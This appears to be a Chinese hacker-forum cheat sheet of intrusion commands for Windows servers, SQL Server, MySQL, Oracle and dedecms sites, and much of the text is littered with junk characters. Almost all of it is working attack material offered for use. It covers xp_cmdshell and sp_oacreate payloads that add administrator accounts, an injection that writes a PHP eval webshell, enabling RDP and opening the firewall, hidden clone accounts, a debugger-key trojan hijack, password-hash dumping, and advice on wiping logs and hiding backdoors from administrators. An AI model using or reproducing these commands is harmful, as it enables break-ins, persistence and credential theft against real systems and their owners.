3 ~+ Y6 H0 ~, b: K, v6 r, h
1.net user administrator /passwordreq:no
, |; K; l9 X4 j, Z8 P5 ^1 a. ?4 ]; }这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
# [* \* Q: C4 L2.比较巧妙的建克隆号的步骤
2 |. \ u) o+ G* t4 }2 L8 Z先建一个user的用户( h( j% K% ~( ?% b& Q* k+ L! n
然后导出注册表。然后在计算机管理里删掉5 _4 v5 M7 `! a
在导入,在添加为管理员组6 s4 l" O' F/ A9 i! p, s0 U
3.查radmin密码
3 o. J/ P4 y* b/ c2 Preg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
' @9 ?9 D: B( v* i) H3 g9 W; |4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
4 ~4 D6 ?3 o9 s1 m4 J. W9 n/ V" i建立一个"services.exe"的项
* }9 x% q, H# z) x再在其下面建立(字符串值)+ d" D4 X% t) {# ^1 h" Q3 R$ E& H
键值为mu ma的全路径
6 D% Y5 n% R6 e1 P/ @' q1 h) w7 t5.runas /user:guest cmd
& h4 b( h3 @# } H3 x- A0 H7 H) v测试用户权限!
V6 A u2 X: K6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
7 y- c/ A f# z( j2 }7 Q7.入侵后漏洞修补、痕迹清理,后门置放:& p6 n2 n5 R. h! k' }1 }/ e
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
9 ?/ c' G5 s) t$ A% N. q: I' h8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
) O, I9 ]7 J4 M0 v* K- }* |
9 D- {7 S0 r- `. K6 Tfor example
# v: N! ~$ z7 d& y7 e( M: s9 {8 v$ I# f& w) r$ Y. P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'' \7 T; f; o& a7 L# B; d4 W
a7 A4 l r8 E& y. d/ i( r7 D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
7 `. ?4 O) |3 w# U
/ A& U% D' I2 s9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
; C4 B! U; n, [0 j: L6 U* J如果要启用的话就必须把他加到高级用户模式$ S& {0 z* ?& E' t- ]
可以直接在注入点那里直接注入
- A+ B: ~' n k- f8 ?- b# jid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
7 c$ u3 R: H T5 |/ o- s2 ?8 d然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--6 S w \* k; U! a% ]6 r b4 b
或者
$ N. @3 q1 a6 E2 Csp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'% {" [. x+ t; `6 n/ C9 C# k7 Y
来恢复cmdshell。2 a8 `; C5 ~- ]) Z! c9 n
% z0 k O/ D O& Z: S2 Z9 c0 D分析器
! }+ ~# N- n( @7 `; J( c9 G0 v0 zEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--" D2 Q0 C: H' M1 V6 ~# H7 l
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")3 [0 d) I" O: U$ B) m1 W' B2 p
10.xp_cmdshell新的恢复办法' `- u7 K& a- O2 ~6 J
xp_cmdshell新的恢复办法# l1 ^3 ?" u! P E1 [5 J2 Y: l7 z
扩展储存过程被删除以后可以有很简单的办法恢复:2 ~" H9 I4 m3 _0 M! k6 i% @- @; x
删除5 E5 _ R q+ h4 H$ ]
drop procedure sp_addextendedproc
z L- g/ y7 E7 c/ g% r4 fdrop procedure sp_oacreate+ ?# Q( ^- E7 U6 K0 t3 m
exec sp_dropextendedproc 'xp_cmdshell'
9 w( |$ k( u, h3 J+ W1 ]9 j) h5 \8 E1 H9 g* X8 Q) Z
恢复
) ~7 D& `2 ?2 h* F. @dbcc addextendedproc ("sp_oacreate","odsole70.dll")
$ ^3 p+ Y; J- l2 c0 f$ B; `5 l4 Adbcc addextendedproc ("xp_cmdshell","xplog70.dll")2 i; v, T9 a Y& m
$ A E: N! `; Y* V% B) I& X3 k
这样可以直接恢复,不用去管sp_addextendedproc是不是存在$ X. l8 r! P( p8 T0 R p3 H7 c; V
7 w, T# K1 b4 l: Q4 ^- Z, F-----------------------------8 P: n* K9 |0 s$ g9 J$ v
! B9 Z: N; a7 Z0 [+ Z m. c \. Y- ]删除扩展存储过过程xp_cmdshell的语句:2 J A/ I# |4 G% m" O& H* B+ V. L: G0 J
exec sp_dropextendedproc 'xp_cmdshell'
1 ]7 l* b+ H1 ~, M2 V K
' h1 m5 R- E% y$ F: T9 ?8 Y9 E2 T恢复cmdshell的sql语句: j4 Y' l0 G4 i8 k5 ?( j' |
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
+ P$ w/ O3 U: [$ J3 G
8 l, m6 E, }3 t3 A$ a( |# W) B$ [- R1 d0 E' ]( s. O( j Y( B
开启cmdshell的sql语句
, ^# ^% s* H% ?! Q2 n3 |" ~( N: E" r- n3 }2 _
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'1 `! H B: v$ |
! w b1 P5 v% P6 D& B5 u判断存储扩展是否存在: u6 q/ Q, m* n9 I* x! X0 [. M
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'( w1 n( R6 N0 \$ }* i( r
返回结果为1就ok
4 _+ e% c/ ]* l. e! E1 w- D& ~. S3 z/ G5 G7 _9 n1 W
恢复xp_cmdshell
# B5 C8 O; s5 C1 E0 z' wexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
& x9 T! i' K* Z) L X1 j. K返回结果为1就ok% I+ k6 ]6 m" s" @3 N
$ y7 e' d8 b& n" {
否则上传xplog7.0.dll, s8 z/ Q! e) I& H' P
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'; u9 R W) Y5 h! `9 f6 B- K
2 \) j; U% e$ e) G$ H; k
堵上cmdshell的sql语句2 o3 Y6 V/ K/ w# U& Y
sp_dropextendedproc "xp_cmdshel
% ] e( `% _# \* Y2 }-------------------------
. o9 o, b1 z) y; s清除3389的登录记录用一条系统自带的命令: x6 t- o: N% N; ]! w5 H+ E' Z/ T$ Z
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
- A1 L; ]; E4 R+ h/ ~
& F( j% S# ?- a, K6 m2 |然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件 A* t) |5 U6 I8 H8 W7 f" ]
在 mysql里查看当前用户的权限2 t3 [5 P0 o( b9 \
show grants for : z8 ]! {0 Y: I
; w0 l4 N. K! W* y& a以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。. f! B3 X4 x3 l' m u5 f* B
4 G8 r9 |5 Y! ?1 w4 o6 T$ }0 H
( U& ^: u0 S/ d( L, RCreate USER 'itpro'@'%' IDENTIFIED BY '123';
4 ]6 c3 u6 `% w. S6 P4 y
/ a" v/ |1 p- r4 ]8 {* pGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION# v0 \, ]6 q! n) z# r
Q. D& E4 a$ U7 I
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0. `1 j$ S' Z: e4 C$ t$ C/ Z
8 K+ g+ Y' g7 S1 IMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
4 V# L2 A7 _, Y* l) H
& @0 \3 n& ~; z搞完事记得删除脚印哟。. B1 y- h8 F7 Y' f# u+ O- V
9 P, C4 n$ L& f, c! @: J$ v
Drop USER 'itpro'@'%';
- j/ O+ Q$ d. w" p( _3 K, m% `8 f
Drop DATABASE IF EXISTS `itpro` ;
5 C2 h1 s- |3 b( s9 {( G3 n4 y9 Y
7 l( _, P* u7 M: R, {7 ]当前用户获取system权限
/ e c* Q( j, v i% S' ?* S4 I9 h7 `sc Create SuperCMD binPath= "cmd /K start" type= own type= interact8 t- h- ?9 U7 T4 O0 ^
sc start SuperCMD2 ]( k4 b+ \. p" i% n
程序代码
& X% o2 l- v3 z0 p$ s<SCRIPT LANGUAGE="VBScript">
# @! n( R. w0 _ ~$ ?9 G: N9 j" Yset wsnetwork=CreateObject("WSCRIPT.NETWORK")& w7 G, @; H: K( M! D
os="WinNT://"&wsnetwork.ComputerName; `6 w& x9 b4 _, g
Set ob=GetObject(os)% i+ F/ g) ~ B
Set oe=GetObject(os&"/Administrators,group")
( B! X& q7 e4 D7 d( I$ k& uSet od=ob.Create("user","nosec")2 k0 C, _3 M) G L' _
od.SetPassword "123456abc!@#"
6 y# J# q0 l' W6 cod.SetInfo1 m; R9 `9 U- f- w7 e
Set of=GetObject(os&"/nosec",user)1 G! }/ t! @& j
oe.add os&"/nosec"- O: Z% b: t9 C2 s, \! O4 e9 [# B
</Script>
8 l2 B4 m6 r3 f$ `% x<script language=javascript>window.close();</script>
5 J* {+ ~9 ]0 a1 U4 e) j5 N9 h8 Q7 J8 }. a- F3 h7 W. D1 E& u8 Y
1 W" j8 y0 P0 D! o" e
0 d/ H/ [9 X: _3 Y# W; w. @4 C0 t5 q8 A( I+ N
突破验证码限制入后台拿shell
8 q' x' y# H& @$ y l程序代码
" Y/ `" y: Y7 C, e0 m% M+ `5 ]REGEDIT4
8 ?; d. @$ m+ v4 i, q3 S[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
1 A$ z/ X) F1 I& ?( |"BlockXBM"=dword:000000009 h9 v D: T) }% Y% L4 e
0 t( b6 ~% r. Q& R7 d+ L保存为code.reg,导入注册表,重器IE' I$ i0 n. Z" c' n' T7 q
就可以了9 X9 A1 K% Q8 b& O4 Y& V
union写马, e4 `! @; d5 W3 v. j) N
程序代码
7 o5 x9 X1 e b; H) f# w! F6 zwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*" z' C! j: i4 w! a
3 e$ Y$ T5 p! t) x/ m应用在dedecms注射漏洞上,无后台写马0 p$ A6 ^8 D2 g- u& H$ s. o0 \7 B
dedecms后台,无文件管理器,没有outfile权限的时候
; I; U; w' i F1 H6 c在插件管理-病毒扫描里
2 m% T$ E5 I0 ]( v2 r写一句话进include/config_hand.php里
% T( }2 r7 \# m$ u1 A* s程序代码: i6 C7 y8 N2 w" ?1 L
>';?><?php @eval($_POST[cmd]);?>0 n! F! H) s; ?% x+ J$ n0 n
W1 N- s6 C6 i3 J! z. v3 M" N
# ^- F; [( t, t" r( z6 Z如上格式 P3 L5 u4 }2 N; @
9 f8 Z8 f) r; h
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解9 S6 |' R; ~0 M7 i4 x; _8 p
程序代码# J! s2 `0 V! o/ e$ v$ b
select username,password from dba_users;# h/ J: l) i1 `! S) r; D2 O
5 d% J% ?* ^( ~, y ?- a! f0 m) Z# ~3 B
mysql远程连接用户
5 m- W" V$ i1 e/ k$ Y程序代码8 Y& B% z( M W
0 A- g- `1 u: w& l) SCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
- @* d% D4 X* |7 |GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION+ Q% h, n5 O& e M G& M+ S4 e! b
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0! x9 `; g9 t* W
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;' t( K* p/ M. @. L7 w7 N% }
2 ?3 o5 d* {* p% A! r
& S0 Y s/ a" m! q# `8 j! _6 ]6 O. \# K9 V
9 D) T, A2 [! I% P s. w U
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 03 l% T$ l( u3 _$ R- z" E# v
9 q1 w1 Y# ]* L1.查询终端端口
; e0 n: n; ~; ~2 O) I o
7 A" v, ~. m9 jxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
& n" n; G) F: Z/ l9 R( I$ X- ?* a3 r' F" s
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
4 `8 o8 T) D. Jtype tsp.reg) `% i7 t" o' O4 u# A7 h/ n# o" G2 W1 }
/ X; C5 M5 h( C2 z1 R+ S& K
2.开启XP&2003终端服务: D$ U1 F1 a; Y; C1 e' {
+ ^9 L& `; V, ?- s4 i' \( u0 V( G& y1 |- z" d- m' |+ E: H
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
% U- [5 m: k( ]$ G7 o5 k! V; `4 Y, ]
+ ?& W: d0 F; x
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
. I& J$ }2 ?$ M* `; W
( J5 g( R, _- M3 m. C7 o$ R3.更改终端端口为20008(0x4E28)5 b% N4 _) n# n3 M- G3 H- h: O
/ K' B6 F" o& a j. v' K" J
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f5 j# t' b: @6 J3 B7 m* J6 l% z) m/ i2 W
* T+ u6 \9 F" j B/ uREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f4 I% u; j6 x) g/ U+ [8 f/ v: r0 A
2 x' S' n: V7 { ?- {' ~! ^0 h% q% U4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制- _; R8 D1 u7 g: n7 H
" O5 n4 f B# X1 ]
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
; V, v0 A- \ E, Z
, L4 U* W, u' @* U7 J
& c( |( r( O$ U9 F( Z$ g# F5.开启Win2000的终端,端口为3389(需重启)3 V2 _ D1 D+ L, i& B
0 X& i2 B, W9 {: f; J* m& T! ?echo Windows Registry Editor Version 5.00 >2000.reg
" u$ ?6 N: N& b- l1 ^# Oecho. >>2000.reg: d! J" d0 J' ?1 z% Y$ J+ Z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
$ R4 ~; p9 P+ A, _/ S @echo "Enabled"="0" >>2000.reg
# J" {% e- _+ S3 Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
* K5 C+ W( F, @0 [$ M( W9 z7 hecho "ShutdownWithoutLogon"="0" >>2000.reg " n+ L" ~# j$ Z: u: u- Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
2 e4 q8 ~9 q* n! A& l, d6 w. Uecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg 0 A' x/ r. N6 Z# B+ k2 \6 V& R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg - x$ y' J2 p q
echo "TSEnabled"=dword:00000001 >>2000.reg 3 q7 H8 N$ _' O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg % W3 ?) w& ~ Q. y5 S( a4 K) J
echo "Start"=dword:00000002 >>2000.reg $ n0 J/ H" }) w) n6 F$ C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
z2 D& Y! k" M- v p: cecho "Start"=dword:00000002 >>2000.reg
4 b- e4 N; I( D, K& V7 Gecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
( M$ S. q/ P- }4 Vecho "Hotkey"="1" >>2000.reg $ }! @- [ O2 y* f8 T, y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg * l1 ]. `7 @6 w6 q
echo "ortNumber"=dword:00000D3D >>2000.reg - Q! x( a. ^% i' n4 Y/ x8 J8 c# I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
; y# R, a8 h ]% F/ Techo "ortNumber"=dword:00000D3D >>2000.reg
# p, d3 M+ Z" H& y7 |7 @
+ a' j8 t0 q: P4 U- v6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
% a* _ M5 e2 j+ ~+ C1 Y
4 W) H' D" `- ^/ A- H@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
2 x, E' d. l6 F. H* |% ?(set inf=InstallHinfSection DefaultInstall)
% U' i9 f% Y; c' wecho signature=$chicago$ >> restart.inf D% n4 K2 k _* M; r# b, A8 K0 I
echo [defaultinstall] >> restart.inf
# H2 u* ]* M4 ?2 urundll32 setupapi,%inf% 1 %temp%\restart.inf) T- H" ~+ L# I; P
! S0 c. r. b* `/ u
$ q$ ^0 d ?$ [& ]8 c2 q
7.禁用TCP/IP端口筛选 (需重启)" @6 H& }& E/ Y8 Q! S" z) @
2 Q- e9 {7 {- WREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f {- v* a, Y3 _7 k; ?; S
: ~" ~' [" {7 c1 r5 t: |8.终端超出最大连接数时可用下面的命令来连接
- C% z9 o0 f3 P. {9 q+ B( M- t3 f* t6 |. }; w/ e
mstsc /v:ip:3389 /console
% U3 J1 F4 a# t$ A$ O- Z( W6 @
! P5 k7 T) X; D0 x$ ~/ [9.调整NTFS分区权限
! h6 N8 }, g( V L
$ N) A) M* r2 Ncacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)( [1 ]+ c6 Y! ]) S, ]1 D3 V% Q' _3 }; S4 q
+ o+ ?4 ?/ ?0 o" h- P# e; r
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
/ w- Z! i" H8 c% k/ t9 k
4 z9 c5 j9 h" f* _------------------------------------------------------- C. n7 g& \) s5 \, U9 ~
3389.vbs 2 S+ V6 h3 e' q+ g; m+ k2 q
On Error Resume Next
5 g, E# U, G/ }, w) R5 O! W$ xconst HKEY_LOCAL_MACHINE = &H80000002
6 Z" f+ A, r7 X( W) p6 XstrComputer = "."/ i) m6 r% ^) [! U
Set StdOut = WScript.StdOut
# [- F+ q& l7 Q' U. xSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_4 `: u; o, y$ G' M6 s: U+ r
strComputer & "\root\default:StdRegProv")
# E1 T5 R' }: R' O% XstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"2 u; T7 Q' t* [$ Q
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
0 e* y. c/ U1 g# z- P( N- z. ~2 _strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
& |5 }+ ^3 r, C& d$ e H; g2 [$ loreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath4 l/ s' \- q0 A* R9 a! t, I8 |
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"% d, s3 w' _9 Y4 N" x0 M
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"8 |' x( Q# W) N- Y3 s% e8 R
strValueName = "fDenyTSConnections"' j6 b. |" f* I! y+ D6 a: a$ _$ T
dwValue = 01 K* P/ c" U2 F. w
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
4 b- S# E3 _. F, P' X$ H' ?strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"7 @+ U/ }6 q1 s; ?
strValueName = "ortNumber"% C; F6 N3 I2 b0 P
dwValue = 3389. ]1 d% r- }* s" _
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
; n+ Q/ j/ t, e0 L/ x& _4 D) w' rstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"6 Y+ |" W- x3 r+ m- H
strValueName = "ortNumber"
6 `3 b* x/ Q; h/ G g; T9 ?9 BdwValue = 33890 \2 K& v5 U4 K" f; m) ]
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue, p1 A+ p/ ?1 j' a+ a
Set R = CreateObject("WScript.Shell") 1 Q- z, k$ E& ?* ~( D
R.run("Shutdown.exe -f -r -t 0")
- J* n" I4 y1 k9 T' p1 V$ Q
: g9 q9 Y4 l' [删除awgina.dll的注册表键值
8 X5 a- @5 X% P u) e3 _程序代码
. t; V$ L' [: I, `
/ C5 O, y8 w. d; O6 a# A2 {' N6 ]reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
$ J. ^0 l0 I7 Z7 }. _9 u" ]1 _2 c) T$ j. w) c
; b9 s* d" V6 a" v, [
" C5 H' r! r& C" y1 j' k( W0 |! ~6 A1 ]& }4 c; e9 Q% ]* `
程序代码7 I: i# R1 C- }* }4 Q: g
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash% l7 u; I) C/ V
5 M h3 |5 D L# U) r设置为1,关闭LM Hash! X \! F& V2 B! u2 S! H$ V
9 |$ R* N2 L3 `3 s+ @8 W( W
数据库安全:入侵Oracle数据库常用操作命令
9 j P, _( h! H( `& H最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。1 O8 l _" d* [8 Q6 C+ t
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。) [" u+ `1 B. Z% I x+ g( R; t
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
; _ L) B5 u& G) E7 F3、SQL>connect / as sysdba ;(as sysoper)或
+ K) t7 p( M& H; q6 H7 Econnect internal/oracle AS SYSDBA ;(scott/tiger)
9 g9 g+ Y: v( ^" Y7 `: C0 T- l* S; j( Lconn sys/change_on_install as sysdba;
& x! v0 b( L- b! u8 U4、SQL>startup; 启动数据库实例& C/ `, \! \7 p1 Z0 ?% a: ^+ b) ~
5、查看当前的所有数据库: select * from v$database;
% B' g8 @! _8 S) g5 U2 _; b" rselect name from v$database;2 a/ ]. p; _/ W
6、desc v$databases; 查看数据库结构字段* `1 p+ Z: l3 ^* e) ]& _# T3 E
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:9 i, s7 e& E! l9 I
SQL>select * from V_$PWFILE_USERS;
6 O. _/ O# E; s- ` c3 @6 ^7 EShow user;查看当前数据库连接用户
+ Q# y6 B3 d2 k! h3 t8、进入test数据库:database test;( L, ~' u( F! c
9、查看所有的数据库实例:select * from v$instance;
) q. h% d2 z3 A. N( c如:ora9i
4 L; V" I/ G0 b10、查看当前库的所有数据表:
# {8 Y& N3 P+ n8 y1 PSQL> select TABLE_NAME from all_tables;
; k. ]8 m Y7 t- }1 v7 s+ Y- sselect * from all_tables;% w: H8 t3 K. C4 s6 Y3 \
SQL> select table_name from all_tables where table_name like '%u%';5 L4 ]: }3 ]( O0 a1 u
TABLE_NAME
/ V1 ~4 H+ n" I# k; C4 Z: H- s( z------------------------------
; `( |/ j& C# j+ d' u& W( N_default_auditing_options_
4 @$ g/ U! _) w8 S7 A( }& \11、查看表结构:desc all_tables;
, n! M3 z8 R5 N7 t: a12、显示CQI.T_BBS_XUSER的所有字段结构:5 D" W; _7 H/ W: u8 `
desc CQI.T_BBS_XUSER;7 x3 o4 P% E; N+ Y
13、获得CQI.T_BBS_XUSER表中的记录:
- o" l5 I' ~: m/ @+ B R* wselect * from CQI.T_BBS_XUSER;- B. R C4 I7 }; }5 p( S Q
14、增加数据库用户:(test11/test)4 ?/ W6 u" A S" d
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
4 ]% H7 `6 F! c, ?& n2 \15、用户授权:
+ V |/ l. p! v1 y7 }grant connect,resource,dba to test11;
' L5 m4 K4 B6 {6 ggrant sysdba to test11;, L* C% v# n0 N. B
commit;3 |8 C! m5 `- G" j2 F
16、更改数据库用户的密码:(将sys与system的密码改为test.)
6 ]: g( i6 t: _9 f% falter user sys indentified by test;5 X3 {6 ]! O4 W+ \
alter user system indentified by test;% ^- v: j, C# ^1 W, c# m
. [6 W& m7 i* Z& }6 B7 v/ bapplicationContext-util.xml
/ ?5 r* R7 p( OapplicationContext.xml, Y9 l( a* q5 o4 B( A
struts-config.xml o+ B% B6 [& [6 k9 @) w+ P4 `
web.xml( b2 r# \" L& A9 U& h
server.xml
% E& w6 W/ K0 t+ t7 rtomcat-users.xml& a4 M$ f# j/ }4 ?
hibernate.cfg.xml' _! [+ d' K+ H2 G& j0 l5 @, P9 Q
database_pool_config.xml
; S* a& o+ i; `) m, e, @" Z. L+ l F% H) m8 Q/ M* D
' n V( }) T! v8 G6 l6 C\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置! H( Z8 b ^, _6 J3 Q; i3 U9 }
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
0 x3 d3 b+ { I. q\WEB-INF\struts-config.xml 文件目录结构
9 E- d7 D, ~- b# b7 ~+ h
) k# Q" k' v N3 X j, Rspring.properties 里边包含hibernate.cfg.xml的名称$ Q! R0 ^, ?' H
) G9 n, M2 a( x# D3 i5 i
/ Q) b! B% H8 s7 ?; p4 p BC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
- g9 S% Q8 O* J( }/ S% ~3 e
, n5 |- c/ g" a. Y如果都找不到 那就看看class文件吧。。
4 X4 W) g. d- Y: L! U/ Y+ S
# V2 D, M1 ~1 j1 T) N( T) D测试1:
l7 F' a$ d6 U7 F x* cSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
' {! y6 A+ v! u6 U% p4 T0 O; f+ C$ g8 J. x9 R* Z+ Q
测试2:8 Z _& _7 b9 U- P: J* z- H3 f8 S
) n7 ^5 t, v" t: f. x8 Q
create table dirs(paths varchar(100),paths1 varchar(100), id int)
/ o$ ^ t# W2 I# f( {) n
. o% o* ] n# t( H' hdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
" c9 o( x- ] f. J0 Y) b2 C: [- i2 A- R# v1 s8 Y8 s3 p+ T
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
, P, g' A2 P( t" s$ q: ?" [8 Y3 J( ?3 Y$ \
查看虚拟机中的共享文件:
& o# s0 y3 y9 x4 ?% e在虚拟机中的cmd中执行
+ X* ], b& M& I) A" B' g( Y# E\\.host\Shared Folders/ d& n! ^* q( f3 t
# j( | q+ ^. D ^+ ~cmdshell下找终端的技巧
# } d$ g) j, o7 \* x- | D; M找终端:
5 W% S2 q: \8 C- H第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 4 F. o* t# f, C5 z8 o V
而终端所对应的服务名为:TermService
( m6 T* H8 w7 ]) z5 Z& b第二步:用netstat -ano命令,列出所有端口对应的PID值! 5 M, u' T1 A) ]( {, v. u0 r
找到PID值所对应的端口* {: l" c1 R; E5 J1 U, z
1 y. g1 F5 D+ H1 }( f4 b) Y查询sql server 2005中的密码hash4 ^0 a H0 `# \# `
SELECT password_hash FROM sys.sql_logins where name='sa'
